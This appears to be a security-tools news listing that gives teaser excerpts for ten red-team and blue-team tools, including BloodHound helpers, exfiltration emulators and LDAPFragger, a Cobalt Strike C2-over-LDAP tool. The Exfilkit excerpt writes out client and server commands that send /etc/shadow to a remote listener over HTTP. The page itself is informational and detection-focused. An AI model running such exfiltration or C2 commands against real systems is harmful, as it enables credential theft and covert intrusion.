Yaralyzer – Visually Inspect And Force Decode YARA And Regex Matches Found In Both Binary And Text Data, With Colors

Visually inspect all of the regex matches (and their sexier, more cloak and dagger cousins, the YARA matches) found in binary data and/or text. See what happens when you force various character encodings upon those matched bytes. With colors. Quick Start pipx install yaralyzer# Scan against YARA definitions in a file:yaralyze –yara-rules /secret/vault/sigmunds_malware_rules.yara lacan_buys_the_dip.pdf# ScanRead More

Cypherhound – Terminal Application That Contains 260+ Neo4j Cyphers For BloodHound Data Sets

A Python3 terminal application that contains 260+ Neo4j cyphers for BloodHound data sets. Why? BloodHound is a staple tool for every red teamer. However, there are some negative side effects based on its design. I will cover the biggest pain points I’ve experienced and what this tool aims to address: My tools think in listsRead More

NetLlix – A Project Created With An Aim To Emulate And Test Exfiltration Of Data Over Different Network Protocols

A project created with an aim to emulate and test exfiltration of data over different network protocols. The emulation is performed w/o the usage of native API’s. This will help blue teams write correlation rules to detect any type of C2 communication or data exfiltration. Currently, this project can help generate HTTP/HTTPS traffic (both GETRead More

AzureHound – Azure Data Exporter For BloodHound

The BloodHound data collector for Microsoft Azure Get AzureHound Release Binaries Download the appropriate binary for your platform from one of our Releases. Rolling Release The rolling release contains pre-built binaries that are automatically kept up-to-date with the main branch and can be downloaded from here. Warning: The rolling release may be unstable. Compiling PrerequisitesRead More

Sandbox_Scryer – Tool For Producing Threat Hunting And Intelligence Data From Public Sandbox Detonation Output

The Sandbox Scryer is an open-source tool for producing threat hunting and intelligence data from public sandbox detonation output The tool leverages the MITRE ATT&CK Framework to organize and prioritize findings, assisting in the assembly of IOCs, understanding attack movement and in threat hunting By allowing researchers to send thousands of samples to a sandboxRead More

Secretflow – A Unified Framework For Privacy-Preserving Data Analysis And Machine Learning

SecretFlow is a unified framework for privacy-preserving data intelligence and machine learning. To achieve this goal, it provides: An abstract device layer consists of plain devices and secret devices which encapsulate various cryptographic protocols. A device flow layer modeling higher algorithms as device object flow and DAG. An algorithm layer to do data analysis andRead More

Goreplay – Open-Source Tool For Capturing And Replaying Live HTTP Traffic Into A Test Environment In Order To Continuously Test Your System With Real Data

GoReplay is an open-source network monitoring tool which can record your live traffic and use it for shadowing, load testing, monitoring and detailed analysis. About As your application grows, the effort required to test it also grows exponentially. GoReplay offers you the simple idea of reusing your existing traffic for testing, which makes it incrediblyRead More

Exfilkit – Data Exfiltration Utility For Testing Detection Capabilities

Data exfiltration utility for testing detection capabilities Description Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only. Exfiltration How-To /etc/shadow -> HTTP GET requests Server # ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETServer -lp 80 -o output.log Client $ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETClient -rh -rp 80 -i ./samples/shadow.txt -r /etc/shadow -> HTTPRead More

Pulsar – Data Exfiltration And Covert Communication Tool

Pulsar is a tool for data exfiltration and covert communication that enable you to create a secure data transfer, a bizarre chat or a network tunnel through different protocols, for example you can receive data from tcp connection and resend it to real destination through DNS packets. Setting up Pulsar Make sure you have atRead More

LDAPFragger – Command And Control Tool That Enables Attackers To Route Cobalt Strike Beacon Data Over LDAP

LDAPFragger is a Command and Control tool that enables attackers to route Cobalt Strike beacon data over LDAP using user attributes. For background information, read the release blog: http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes Dependencies and installation Compiled with .NET 4.0, but may work with older and newer .NET frameworks as well Usage Active Directory domain –ldaps: Use LDAPS insteadRead More